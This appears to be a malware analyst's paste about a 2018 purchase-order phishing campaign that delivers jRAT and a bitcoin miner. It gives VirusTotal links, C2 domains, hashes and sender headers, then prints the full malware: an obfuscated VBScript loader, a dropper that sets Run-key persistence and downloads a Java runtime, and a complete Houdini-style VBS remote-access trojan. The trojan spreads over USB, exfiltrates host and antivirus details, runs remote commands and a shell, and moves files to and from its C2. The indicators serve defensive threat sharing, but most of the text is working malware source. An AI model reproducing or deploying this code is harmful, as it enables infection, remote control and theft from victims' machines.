2018-11-05 Jrat and Bitcoin minder from PO phish

#phishing email drops a bitcoin miner and jrat out of a .IMG file with a .VBS inside

more info @neonprimetime
https://neonprimetime.blogspot.com/2018/11/jrat-and-bitcoin-miner-from-img-vbs-phish.html

------
VT links
------
https://www.virustotal.com/#/file/f2bd54981d86e7d475164ca5725090232dc1efd5251c42b58292d8b51e506aa2/community
https://www.virustotal.com/#/file/370784be22039af009a0b4e7915e36c4899133ac3afbb659cbbbec03dc9a2c6e/community
https://www.virustotal.com/#/file/07e13a645058b0f0afe4e79a34abf08dbead97c50b41cb9593035af13250e0f1/community
https://www.virustotal.com/#/file/b0cf01550e576a21ff62f1c34dbe202b14b73b0465cdf7558c445f09eee3a6c1/community
https://www.virustotal.com/#/file/5dcd1a584e27f75870b2c95aac56523927377d8c693fe6fc8a3f422cac79cadc/community
https://www.virustotal.com/#/file/77ecb4b190368eacf09103247fdd75c0c30a6b3c3340acb3d15df7747178cabc/community

----
app anyrun
----
https://app.any.run/tasks/77449da4-d60e-4c45-922c-b4a85c7ef814

-----
dns
-----
welcomehome.duckdns.org [173.46.85.98]
fud.fudcrypt.com

----
md5 hashes
----
f3a99bcd752bff6a15154484c94cdc21
f3c67b1a2631fde05b24ab26ce5bf6ea
b93df40c82b94680218ea964b5ce6808 ( THOR APT scanner says #magickitten #jrat #MiddleEasternThreatGroups )
11d828c9301a36749174b1e0459cba55
d859b188405930541aea64ad22f8cf92
7443f9ecbd050b1e7eae529983543b05

------
email headers
------
X-Env-Sender: dbittnerf@gmail.com
x-originating-ip: [162.144.196.83]
Received: from server.ineli-mena.org (HELO server.ineli-mena.org)
From: "Purchase Assistance" <dbittnerf@gmail.com>
Subject: RE: B&amp;G EQUIPMENT PO# 102571
Date: Mon, 5 Nov 2018

---------------
vbscript
---------------
Set noun = CreateObject("ADODB.Stream")
Private Function hen(water, omo, alafia)
  If omo = 4 Then
    noun.Type = 1
    noun.Open
    noun.Write water
    noun.Position = 0
    noun.Type = 2
    noun.CharSet = "us-ascii"
    hen = noun.ReadText
  End If
End Function

Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
    Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
    Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
    ms_pmt_dfa.DataType = "bin.base64"
    ms_pmt_dfa.Text = kili
    bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
End Function
Private Sub table(chair, milo, sound, clef, sule, naira)
    For i = 0 To 0
        ExecuteGlobal naira
    Next
End Sub

Private Function linen(stove, gard, radio, ladela)
    Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
    m_u_t_e_x = "#("
    the_const = "m"
    m_a_i_n = "[REMOVED]"
    pau_sed = ""
    If radio = 0 Then
        pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
        linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
    Else
        'table "7", False, 10, ladela, Nothing, 10
        linen = ladela
    End If
End Function
Dim kilimanjaro
kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
table "2", Nothing, False, True, 0, kilimanjaro
Set noun = Nothing

---------------
decoded binary
---------------
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim longText1
longText1 = "[REMOVED]"
Set wshShell1 = CreateObject("WScript.Shell")
Dim appdatadir1, stubpath1
appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%")
stubpath1 = appdatadir1 & "\VRMedabkRb.vbs"
Dim decoded1
decoded1 = decodeBase64(longText1)
writeBytes stubpath1, decoded1
wshShell1.Run("""" & stubpath1 & """")
Set wshShell1 = Nothing
Dim longText
longText = "[REMOVED]"
longText = Replace(longText, "#(", "A")
Set wshShell = CreateObject( "WScript.Shell" )
Dim tempdir, appdatadir, text, stubpath
tempdir = wshShell.ExpandEnvironmentStrings("%temp%")
appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%")
stubpath = appdatadir & "\ntfsmgr.jar"
Dim decoded
decoded = decodeBase64(longText)
writeBytes stubpath, decoded
Set fso  = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\CurrentVersion")
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
If text = "" Then
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion")
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
If text <> "" Then
text = text & "\bin\javaw.exe"
End If
Else
text = text & "\bin\javaw.exe"
End If
If InStr(text, "jre") > 0 Then
Dim validJrePath
validJrePath = getValidJre(text)
If InStr(validJrePath, "javaw.exe") > 0 Then
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & validJrePath & """ -jar """ & stubpath & """", "REG_SZ"
wshShell.Run("""" & validJrePath & """" & " -jar " & """" & stubpath & """")
Else
GrabJreFromNet()
End If
Else
GrabJreFromNet()
End If
Private Sub GrabJreFromNet()
Dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.thegoldfingerinc.com/images/jre.zip", False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile appdatadir & "\jre.zip", 2
end with
UnZip appdatadir & "\jre.zip", appdatadir & "\jre7"
wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion", "1.7", "REG_SZ"
wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\1.7\JavaHome", appdatadir & "\jre7", "REG_SZ"
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """", "REG_SZ"
wshShell.Run("""" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """")
End Sub
Private Function decodeBase64(base64)
Dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
EL.Text = base64
decodeBase64 = EL.NodeTypedValue
End Function
Private Sub writeBytes(file, bytes)
Dim binaryStream
Set binaryStream = CreateObject("ADODB.Stream")
binaryStream.Type = TypeBinary
binaryStream.Open
binaryStream.Write bytes
binaryStream.SaveToFile file, ForWriting
End Sub
Sub UnZip(zipfile, ExtractTo)
if fso.GetExtensionName(zipfile) = "zip" then
If NOT fso.FolderExists(ExtractTo) Then
fso.CreateFolder(ExtractTo)
End If
set objShell = CreateObject("Shell.Application")
set destination = objShell.NameSpace(ExtractTo)
set zip_content = objShell.NameSpace(zipfile).Items
for i = 0 to zip_content.count - 1
if (fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))) then
fso.DeleteFile(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))
end if
destination.copyHere zip_content.item(i), 20
next
End if
End Sub
Function getValidJre(res)
a = Split(res, vbCrLf)
for each x in a
if InStr(x, "javaw.exe") > 0 Then
Return = wshShell.Run("cmd /c " & """" & x & """" & " -version 2> %temp%\output.txt", 0, true)
Set file = fso.OpenTextFile(tempdir & "\output.txt", 1)
text = file.ReadAll
file.Close
If InStr(text, "1.6") > 0 Or InStr(text, "1.7") > 0 Or InStr(text, "1.8") > 0 Then
getValidJre = x
Exit Function
End If
End If
next
End Function
Set wshShell = Nothing


------
nested vbscript
------
Set noun = CreateObject("ADODB.Stream")
Private Function hen(water, omo, alafia)
  If omo = 4 Then
    noun.Type = 1
    noun.Open
    noun.Write water
    noun.Position = 0
    noun.Type = 2
    noun.CharSet = "us-ascii"
    hen = noun.ReadText
  End If
End Function

Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
    Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
    Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
    ms_pmt_dfa.DataType = "bin.base64"
    ms_pmt_dfa.Text = kili
    bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
End Function
Private Sub table(chair, milo, sound, clef, sule, naira)
    For i = 0 To 0
        ExecuteGlobal naira
    Next
End Sub

Private Function linen(stove, gard, radio, ladela)
    Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
    m_u_t_e_x = "#("
    the_const = "A"
    m_a_i_n = "[REMOVED]"
    pau_sed = ""
    If radio = 0 Then
        pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
        linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
    Else
        'table "7", False, 10, ladela, Nothing, 10
        linen = ladela
    End If
End Function
Dim kilimanjaro
kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
table "2", Nothing, False, True, 0, kilimanjaro
Set noun = Nothing


-----
3rd nested script decoded
-----

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

'host = "pm2bitcoin.com"
'port = 3175
host = "fud.fudcrypt.com"
port = 7755
installdir = "%appdata%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)
case  "delete"
      param = cmd (1)
      deletefaf (param)
case  "exit-process"
      param = cmd (1)
      exitprocess (param)
case  "sleep"
      param = cmd (1)
      sleep = eval (param)
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path)
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
     osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If


upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
        .type = 1
        .open
        .write objhttpdownload.responsebody
        .savetofile strsaveto
        .close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub

sub download (fileurl,filedir)

if filedir = "" then
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
    set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload
         .type = 1
         .open
         .write objhttpdownload.responsebody
         .savetofile strsaveto
         .close
    end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade
     .type = 1
     .open
     .loadfromfile fileurl
     buffer = .read
     .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
    enumprocess = enumprocess & objitem.name & "|"
    enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else
   readallfromany = ""
end if

cmdshell = readallfromany
end function